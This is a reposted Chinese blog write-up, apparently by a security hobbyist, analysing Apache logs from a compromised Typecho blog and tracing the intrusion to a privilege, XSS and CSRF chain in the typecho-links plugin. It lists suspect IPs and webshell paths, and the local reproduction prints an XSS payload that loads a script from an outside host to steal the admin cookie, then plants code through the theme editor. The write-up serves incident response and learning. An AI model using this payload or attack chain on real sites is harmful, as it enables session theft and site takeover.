【转】分析、还原一次typecho入侵事件

作者：Lz1y

基友szrzvdny的朋友博客被入侵了,由于是虚拟空间,所以只有apache访问日志以供分析

这里已经做去敏操作了，以供学习:

链接: https://pan.baidu.com/s/1JUII7_ZOK1SIxnWxlzu0Hw 密码: bykr

 

整个事情发生的挺突然的，我也是第一次搞这种溯源、应急响应的东西~一想到说不定就拿到了typecho的0day，其实还是很激动的。

首先分析日志，Linux可以用grep，我 ,Windows  ,Notepad++

 

首先直接查找木马文件

首先搜一搜常用的恶意函数，例如Eval、assert、phpinfo()、pwd等等

搜索PHPINFO()的时候，找到了大量的404页面访问记录

最后通过分析，得到了一句话木马地址为/1.php  以及 /1_1.php

 

由于Apache的log默认不记录post数据，这些文件像是凭空出现一般，接下来我们通过IP来反查!

通过访问一句话木马的频率，得到了以下可疑IP:

223.104.170.145
103.250.73.27
112.120.33.163

根据访问时间，以及访问动作，锁定112.120.33.163为攻击者IP

可以看到嫌疑人通过两天的踩点,在3月16日访问了/index.php/action/links-edit后，3月18日入侵进了后台。

可能你跟我想的一样，对没错，这就是通过XSS入侵的一次安全事件

github看了源码之后发现，源程序并无action/links-edit这些函数方法

而这一切的问题都出在一款插件上: typecho-links

该插件是一款管理友情链接的拓展

分析一波源码:

主要的漏洞利用链:

垂直越权（前台添加links）—XSS（links未过滤，直接入库）—CSRF （直接以管理员权限执行某些操作）

简单分析下源码~

越权，未验证用户权限

XSS，未过滤标签

本地复现：

搭建好博客，然后添加插件，退出登录

POST URL,虽然并未登陆，但是显示Link已经添加

 

确实添加成功了。

 

接下来插入xss payload

payload

name=<script
src='http://1.1.1.1/xss.js'>&url=http%3A%2F%2Faaaaa&sort=aaa&image=&description=aaa&user=&do=insert&lid=

 

xss.js 通过引入JQuery以及调用Ajax方法，传递cookie

得到了cookie,进入后台后

 

通过/admin/theme-editor.php?theme=default&file=404.php

 

然后访问不存在的页面，触发包含404.php就可以了~

 

 

 

写的十分粗糙，旨在记录一下第一次分析日志的经历~

 

Love & Peace

原文链接：http://www.lz1y.cn/archives/1254.html

相关推荐: OpenCart前台某插件注入漏洞【CVE-2018-11231】

0x00 cms简介 OpenCart 是近年来国内外非常流行的 PHP 开源电子商务网站系统。该电商网站系统安装方便，功能强大，操作简单。支持多语言、多货币和多店铺。OpenCart 外围开发生态圈发达，更有上万款免费和收费的模块插件和模板主题可供选择。代码…